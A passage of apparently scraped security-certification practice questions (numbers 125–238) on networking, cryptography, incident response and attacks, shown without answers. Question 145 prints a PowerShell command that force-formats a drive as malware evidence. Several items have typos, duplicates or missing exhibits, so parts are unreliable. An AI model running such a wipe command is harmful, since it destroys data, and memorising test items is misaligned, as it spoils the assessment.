Configure IDS capabilities on the internet firewall to alert on the particular exploits used by the tester.

C.

Set up NetFlow on all data center switches connected to the servers.

D.

Deploy FIM agents on all servers in the environment.

Question 125

A business uses Wi-Fi with content filtering enabled. An employee noticed a coworker accessed a blocked site from a work computer and reported the issue. While investigating the issue, a security administrator found another device providing internet access to certain employees. Which of the following best describes the security risk?

Options:

A.

The host-based security agent is not running on all computers.

B.

A rogue access point is allowing users to bypass controls.

C.

Employees who have certain credentials are using a hidden SSID.

D.

A valid access point is being jammed to limit availability.

Question 126

Which of the following threat actors is most likely to use a high level of sophistication and potentially zero-day exploits to target organizations and systems?

Options:

A.

APT groups

B.

Script kiddies

C.

Hacktivists

D.

Ethical hackers

Question 127

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device. Which of the following best describes the user’s activity?

Options:

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Question 128

Which of the following is the most likely way a rogue device was allowed to connect'?

Options:

A.

A user performed a MAC cloning attack with a personal device.

B.

A DHCP failure caused an incorrect IP address to be distributed.

C.

An administrator bypassed the security controls for testing.

D.

DNS hijacking let an attacker intercept the captive portal traffic.

Question 129

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would best support the policy?

Options:

A.

Mobile device management

B.

Full device encryption

C.

Remote wipe

D.

Biometrics

Question 130

A web architect would like to move a company's website presence to the cloud. One of the management team's key concerns is resiliency in case a cloud provider's data center or network connection goes down. Which of the following should the web architect consider to address this concern?

Options:

A.

Containers

B.

Virtual private cloud

C.

Segmentation

D.

Availability zones

Question 131

Which Of the following is a primary security concern for a setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Question 132

A security analyst is hardening a network infrastructure The analyst is given the following requirements

• Preserve the use of public IP addresses assigned to equipment on the core router

• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select two).

Options:

A.

Configure VLANs on the core router

B.

Configure NAT on the core router.

C.

Configure BGP on the core router

D.

Enable AES encryption on the web server

E.

Enable 3DES encryption on the web server

F.

Enable TLSv2 encryption on the web server

Question 133

A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors Of real-world events in order to improve the incident response team's process. Which Of the following is the analyst most likely participating in?

Options:

A.

MITRE ATT&CK

B.

Walk-through

C.

Red team

D.

Purple team-I

E.

TAXI

Question 134

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the best mitigation strategy to prevent this from happening in the future?

Options:

A.

User training

B.

CAsB

C.

MDM

D.

EDR

Question 135

An organization is building a new headquarters and has placed fake cameras around the building in an attempt to discourage potential intruders. Which of the following kinds of controls describes this security method?

Options:

A.

Detective

B.

Deterrent

C.

Directive

D.

Corrective

Question 136

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Question 137

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly Which of the following technologies should the IT manager use when implementing MFA?

Options:

A.

One-time passwords

B.

Email tokens

C.

Push notifications

D.

Hardware authentication

Question 138

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Deny: Any Any 21 -Deny: Any Any

B.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Deny: Any Any 22 -Allow: Any Any 21 -Deny: Any Any

C.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 22 -Deny: Any Any 67 -Deny: Any Any 68 -Deny: Any Any 21 -Allow: Any Any

D.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Deny: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Allow: Any Any 21 -Allow: Any Any

Question 139

To reduce and limit software and infrastructure costs the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have secunty controls to protect sensitive data Which of the following cloud services would best accommodate the request?

Options:

A.

laaS

B.

PaaS

C.

DaaS

D.

SaaS

Question 140

A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would bast prevent email contents from being released should another breach occur?

Options:

A.

Implement S/MIME to encrypt the emails at rest.

B.

Enable full disk encryption on the mail servers.

C.

Use digital certificates when accessing email via the web.

D.

Configure web traffic to only use TLS-enabled channels.

Question 141

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Question 142

A web server has been compromised due to a ransomware attack. Further Investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

Options:

A.

The last incremental backup that was conducted 72 hours ago

B.

The last known-good configuration stored by the operating system

C.

The last full backup that was conducted seven days ago

D.

The baseline OS configuration

Question 143

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 144

A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Select two).

Options:

A.

passphrase

B.

Time-based one-time password

C.

Facial recognition

D.

Retina scan

E.

Hardware token

F.

Fingerprints

Question 145

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Question 146

Which of the following best reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

Options:

A.

Implement proper network access restrictions.

B.

Initiate a bug bounty program.

C.

Classify the system as shadow IT.

D.

Increase the frequency of vulnerability scans.

Question 147

A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night. Which of the following would use the least amount of storage space for backups?

Options:

A.

A weekly, incremental backup with daily differential backups

B.

A weekly, full backup with daily snapshot backups

C.

A weekly, full backup with daily differential backups

D.

A weekly, full backup with daily incremental backups

Question 148

A security analyst is currently addressing an active cyber incident. The analyst has been able to identify affected devices that are running a malicious application with a unique hash. Which of the following is the next step according to the incident response process?

Options:

A.

Recovery

B.

Lessons learned

C.

Containment

D.

Preparation

Question 149

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Question 150

A company's help desk has received calls about the wireless network being down and users being unable to connect to it The network administrator says all access points are up and running One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Question 151

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Question 152

A security analyst needs to implement security features across smartphones. laptops, and tablets. Which of the following would be the most effective across heterogeneous platforms?

Options:

A.

Enforcing encryption

B.

Deploying GPOs

C.

Removing administrative permissions

D.

Applying MDM software

Question 153

You are security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the Infecton and then deny each remaining hosts clean or infected.

Options:

Question 154

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 155

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Question 156

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls' (Select two).

Options:

A.

ISO

B.

PCI DSS

C.

SOC

D.

GDPR

E.

CSA

F.

NIST

Question 157

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Question 158

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Question 159

A company wants to deploy PKI on its internet-facing website The applications that are currently deployed are

• www company.com (mam website)

• contact us company com (for locating a nearby location)

• quotes company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store company com Which of the following certificate types would best meet the requirements?

Options:

A.

SAN

B.

Wildcard

C.

Extended validation

D.

Self-signed

Question 160

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Question 161

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would prevent this issue?

Options:

A.

Documenting the new policy in a change request and submitting the request to change management

B.

Testing the policy in a non-production environment before enabling the policy in the production network

C.

Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new policy

D.

Including an "allow any" policy above the "deny any" policy

Question 162

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the ‘company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two).

Options:

A.

Federation

B.

Identity proofing

C.

Password complexity

D.

Default password changes

E.

Password manager

F.

Open authentication

Question 163

Which of the following can best protect against an employee inadvertently installing malware on a company system?

Options:

A.

Host-based firewall

B.

System isolation

C.

Least privilege

D.

Application allow list

Question 164

A security engineer is setting up passwordless authentication for the first time.

INSTRUCTIONS

Use the minimum set of commands to set this up and verify that it works. Commands cannot be reused.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 165

Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Question 166

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

Options:

A.

Persistence

B.

Port scanning

C.

Privilege escalation

D.

Pharming

Question 167

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

Error

D.

Network

E.

Firewall

F.

System

Question 168

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Question 169

A financial institution would like to store its customer data in the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution Is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would best meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Question 170

A government organization is developing an advanced Al defense system. Develop-ers are using information collected from third-party providers Analysts are no-ticing inconsistencies in the expected powers Of then learning and attribute the Outcome to a recent attack on one of the suppliers. Which of the following IS the most likely reason for the inaccuracy of the system?

Options:

A.

Improper algorithms security

B.

Tainted training data

C.

virus

D.

Cryptomalware

Question 171

Which of the following roles is responsible for defining the protection type and Classification type for a given set of files?

Options:

A.

General counsel

B.

Data owner

C.

Risk manager

D.

Chief Information Officer

Question 172

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

Options:

A.

SaaS

B.

PaaS

C.

laaS

D.

DaaS

Question 173

Which Of the following vulnerabilities is exploited an attacker Overwrite a reg-ister with a malicious address that changes the execution path?

Options:

A.

VM escape

B.

SQL injection

C.

Buffer overflow

D.

Race condition

Question 174

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 175

A network penetration tester has successfully gained access to a target machine. Which of the following should the penetration tester do next?

Options:

A.

Clear the log files of all evidence

B.

Move laterally to another machine.

C.

Establish persistence for future use.

D.

Exploit a zero-day vulnerability.

Question 176

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll?

Options:

A.

SCAP

B.

NetFlow

C.

Antivirus

D.

DLP

Question 177

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Question 178

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

Options:

A.

SFTP

B.

AIS

C.

Tor

D.

loC

Question 179

A user reports constant lag and performance issues with the wireless network when working at a local coffee shop A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:

Which of the following attacks does the analyst most likely see in this packet capture?

Options:

A.

Session replay

B.

Evil twin

C.

Bluejacking

D.

ARP poisoning

Question 180

Which of the following is constantly scanned by internet bots and has the highest risk of attack in the case of the default configurations?

Options:

A.

Wearable sensors

B.

Raspberry Pi

C.

Surveillance systems

D.

Real-time operating systems

Question 181

A cyber security administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall Which of the following would be the best option to remove the rules?

Options:

A.

# iptables -t mangle -X

B.

# iptables -F

C.

# iptables -2

D.

# iptables -P INPUT -j DROP

Question 182

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability?

Options:

A.

Legacy operating system

B.

Weak configuration

C.

Zero day

D.

Supply chain

Question 183

A security analyst receives an alert from the company's S1EM that anomalous activity is coming from a local source IP address of 192 168 34.26 The Chief Information Security Officer asks the analyst to block the originating source Several days later another employee opens an internal ticket stating that vulnerability scans are no longer being performed property. The IP address the employee provides is 192 168.34 26. Which of the following describes this type of alert?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Question 184

A company has installed badge readers for building access but is finding unau-thorized individuals roaming the hallways Of the following is the most likely cause?

Options:

A.

Shoulder surfing

B.

Phishing

C.

Tailgating

D.

Identity fraud

Question 185

Two organizations are discussing a possible merger Both Organizations Chief Fi-nancial Officers would like to safely share payroll data with each Other to de-termine if the pay scales for different roles are similar at both organizations Which Of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

Options:

A.

Pseudo-anonymization

B.

Tokenization

C.

Data masking

D.

Encryption

Question 186

An audit report indicates multiple suspicious attempts to access company resources were made. These attempts were not detected by the company. Which of the following would be the best solution to implement on the company's network?

Options:

A.

Intrusion prevention system

B.

Proxy server

C.

Jump server

D.

Security zones

Question 187

A network administrator has been alerted that web pages are experiencing long load times After determining it is not a routing or DNS issue the administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago

1 sec ave: 99 percent busy

5 sec ave: 97 percent busy

1 min ave: 83 percent busy

Which of the following is The router experiencing?

Options:

A.

DDoS attack

B.

Memory leak

C.

Buffer overflow

D.

Resource exhaustion

Question 188

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C.

HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D.

HTTPS://".comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Question 189

Which of the following is most likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

Options:

A.

An RTO report

B.

A risk register

C.

A business impact analysis

D.

An asset value register

E.

A disaster recovery plan

Question 190

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

Options:

A.

decrease the mean time between failures.

B.

remove the single point of failure.

C.

cut down the mean time to repair

D.

reduce the recovery time objective

Question 191

An organization routes all of its traffic through a VPN Most users are remote and connect into a corporate data center that houses confidential information There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself Which of the following is the weakest design element?

Options:

A.

The DLP appliance should be integrated into a NGFW.

B.

Split-tunnel connections can negatively impact the DLP appliance's performance.

C.

Encrypted VPN traffic will not be inspected when entering or leaving the network.

D.

Adding two hops in the VPN tunnel may slow down remote connections

Question 192

A security administrator needs to inspect in-transit files on the enterprise network to search for PI I credit card data, and classification words Which of the following would be the best to use?

Options:

A.

IDS solution

B.

EDR solution

C.

HIPS software solution

D.

Network DLP solution

Question 193

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Question 194

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

Options:

A.

Authentication protocol

B.

Encryption type

C.

WAP placement

D.

VPN configuration

Question 195

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt ail historical data?

Options:

A.

Perfect forward secrecy

B.

Elliptic-curve cryptography

C.

Key stretching

D.

Homomorphic encryption

Question 196

A security analyst reviews a company’s authentication logs and notices multiple authentication failures. The authentication failures are from different usernames that share the same source IP address. Which of the password attacks is MOST likely happening?

Options:

A.

Dictionary

B.

Rainbow table

C.

Spraying

D.

Brute-force

Question 197

A security architect is implementing a new email architecture for a company. Due to security concerns, the Chief Information Security Officer would like the new architecture to support email encryption, as well as provide for digital signatures. Which of the following should the architect implement?

Options:

A.

TOP

B.

IMAP

C.

HTTPS

D.

S/MIME

Question 198

A company Is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

Options:

A.

Configure the guest wireless network to be on a separate VLAN from the company's internal wireless network

B.

Change the password for the guest wireless network every month.

C.

Decrease the power levels of the access points for the guest wireless network.

D.

Enable WPA2 using 802.1X for logging on to the guest wireless network.

Question 199

An organization is moving away from the use of client-side and server-side certificates for EAR The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

Options:

A.

PEAP

B.

EAP-FAST

C.

EAP-TLS

D.

EAP-TTLS

Question 200

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

Options:

A.

Disable Telnet and force SSH.

B.

Establish a continuous ping.

C.

Utilize an agentless monitor

D.

Enable SNMPv3 With passwords.

Question 201

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

Options:

A.

A DMZ

B.

A VPN a

C.

A VLAN

D.

An ACL

Question 202

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the day.

• Endpoint protection was disabled on several workstations throughout the network.

• Travel times on logins from the affected users are impossible.

• Sensitive data is being uploaded to external sites.

• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

Options:

A.

Brute-force

B.

Keylogger

C.

Dictionary

D.

Rainbow

Question 203

Hackers recently attacked a company's network and obtained several unfavorable pictures from the Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a ransom is not paid. Which of the following is impacted the MOST?

Options:

A.

Identify theft

B.

Data loss

C.

Data exfiltration

D.

Reputation

Question 204

A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

Options:

A.

Non-credentialed

B.

Web application

C.

Privileged

D.

Internal

Question 205

A network analyst is investigating compromised corporate information. The analyst leads to a theory that network traffic was intercepted before being transmitted to the internet. The following output was captured on an internal host:

Based on the IoCS, which of the following was the MOST likely attack used to compromise the network communication?

Options:

A.

Denial of service

B.

ARP poisoning

C.

Command injection

D.

MAC flooding

Question 206

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen.Which of the following would BEST meet these requirements? (Select TWO).

Options:

A.

Full-device encryption

B.

Network usage rules

C.

Geofencing

D.

Containerization

E.

Application whitelisting

F.

Remote control

Question 207

Which of the following describes a maintenance metric that measures the average time required to troubleshoot and restore failed equipment?

Options:

A.

RTO

B.

MTBF

C.

MTTR

D.

RPO

Question 208

A network analyst is setting up a wireless access point for a home office in a remote, rural location. The requirement is that users need to connect to the access point securely but do not want to have to remember passwords Which of the following should the network analyst enable to meet the requirement?

Options:

A.

MAC address filtering

B.

802.1X

C.

Captive portal

D.

WPS

Question 209

Which of the following environments typically hosts the current version configurations and code, compares user-story responses and workflow, and uses a modified version of actual data for testing?

Options:

A.

Development

B.

Staging

C.

Production

D.

Test

Question 210

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Question 211

A company acquired several other small companies The company thai acquired the others is transitioning network services to the cloud The company wants to make sure that performance and security remain intact Which of the following BEST meets both requirements?

Options:

A.

High availability

B.

Application security

C.

Segmentation

D.

Integration and auditing

Question 212

Which of the following environments can be stood up in a short period of time, utilizes either dummy data or actual data, and is used to demonstrate and model system capabilities and functionality for a fixed, agreed-upon

duration of time?

Options:

A.

PoC

B.

Production

C.

Test

D.

Development

Question 213

The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate on incident response and to outsource outbound Internet URL categorization and filtering to an outside company. Additionally, the CISO would like this solution to provide the same protections even when a company laptop or mobile device is away from a home office. Which of the following should the CISO choose?

Options:

A.

CASB

B.

Next-generation SWG

C.

NGFW

D.

Web-application firewall

Question 214

A grocery store is expressing security and reliability concerns regarding the on-site backup strategy currently being performed by locally attached disks. The main concerns are the physical security of the backup media and the durability of the data stored on these devices Which of the following is a cost-effective approach to address these concerns?

Options:

A.

Enhance resiliency by adding a hardware RAID.

B.

Move data to a tape library and store the tapes off-site

C.

Install a local network-attached storage.

D.

Migrate to a cloud backup solution

Question 215

A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as follows:

* Ensure mobile devices can be tracked and wiped.

* Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

Options:

A.

A Geofencing

B.

Biometric authentication

C.

Geolocation

D.

Geotagging

Question 216

A user reports trouble using a corporate laptop. The laptop freezes and responds slowly when writing documents and the mouse pointer occasional disappears.

The task list shows the following results

Which of the following is MOST likely the issue?

Options:

A.

RAT

B.

PUP

C.

Spyware

D.

Keylogger

Question 217

Which of the following environment utilizes dummy data and is MOST to be installed locally on a system that allows to be assessed directly and modified easily wit each build?

Options:

A.

Production

B.

Test

C.

Staging

D.

Development

Question 218

Which of the following isa risk that is specifically associated with hesting applications iin the public cloud?

Options:

A.

Unsecured root accounts

B.

Zero day

C.

Shared tenancy

D.

Insider threat

Question 219

A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

Options:

A.

A RAT

B.

Ransomware

C.

Polymophic

D.

A worm

Question 220

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

MOU

Question 221

The SIEM at an organization has detected suspicious traffic coming a workstation in its internal network. An analyst in the SOC the workstation and discovers malware that is associated with a botnet is installed on the device A review of the logs on the workstation reveals that the privileges of the local account were escalated to a local administrator. To which of the following groups should the analyst report this real-world event?

Options:

A.

The NOC team

B.

The vulnerability management team

C.

The CIRT

D.

The read team

Question 222

Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

Options:

A.

GDPR

B.

PCI DSS

C.

ISO 27000

D.

NIST 800-53

Question 223

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

C.

HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

D.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00

Question 224

The following are the logs of a successful attack.

Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Question 225

Which of the technologies is used to actively monitor for specific file types being transmitted on the network?

Options:

A.

File integrity monitoring

B.

Honeynets

C.

Tcpreplay

D.

Data loss prevention

Question 226

Which of the following incident response steps occurs before containment?

Options:

A.

Eradication

B.

Recovery

C.

Lessons learned

D.

Identification

Question 227

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the BEST solution to prevent this type of incident from occurring again?

Options:

A.

Enforce the use of a controlled trusted source of container images

B.

Deploy an IPS solution capable of detecting signatures of attacks targeting containers

C.

Define a vulnerability scan to assess container images before being introduced on the environment

D.

Create a dedicated VPC for the containerized environment

Question 228

An employee's company account was used in a data breach Interviews with the employee revealed:

• The employee was able to avoid changing passwords by using a previous password again.

• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccuring? (Select TWO)

Options:

A.

Geographic dispersal

B.

Password complexity

C.

Password history

D.

Geotagging

E.

Password lockout

F.

Geofencing

Question 229

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

•Must be able to differentiate between users connected to WiFi

•The encryption keys need to change routinely without interrupting the users or forcing reauthentication

•Must be able to integrate with RADIUS

•Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

Options:

A.

WPA2-Enterprise

B.

WPA3-PSK

C.

802.11n

D.

WPS

Question 230

A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Select TWO)

Options:

A.

Auto-update

B.

HTTP headers

C.

Secure cookies

D.

Third-party updates

E.

Full disk encryption

F.

Sandboxing

G.

Hardware encryption

Question 231

Which of the following is a cryptographic concept that operates on a fixed length of bits?

Options:

A.

Block cipher

B.

Hashing

C.

Key stretching

D.

Salting

Question 232

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network witches. Which of the following is the security analyst MOST likely observing?

Options:

A.

SNMP traps

B.

A Telnet session

C.

An SSH connection

D.

SFTP traffic

Question 233

A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned In the email. This BEST describes a scenario related to:

Options:

A.

whaling.

B.

smishing.

C.

spear phishing

D.

vishing

Question 234

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks Which of the following should the administrator consider?

Options:

A.

Hashing

B.

Salting

C.

Lightweight cryptography

D.

Steganography

Question 235

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset Link. Which of the attacks is being used to target the company?

Options:

A.

Phishing

B.

Vishing

C.

Smishing

D.

Spam

Question 236

A security researcher has alerted an organization that its sensitive user data was found for sale on a website. Which of the following should the organization use to inform the affected parties?

Options:

A.

A An incident response plan

B.

A communications plan

C.

A business continuity plan

D.

A disaster recovery plan

Question 237

Which of the following conditions impacts data sovereignty?

Options:

A.

Rights management

B.

Criminal investigations

C.

Healthcare data

D.

International operations

Question 238

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

Options:

A.

SSO

B.

MFA

C.

PKI

D.

OLP

Question 239

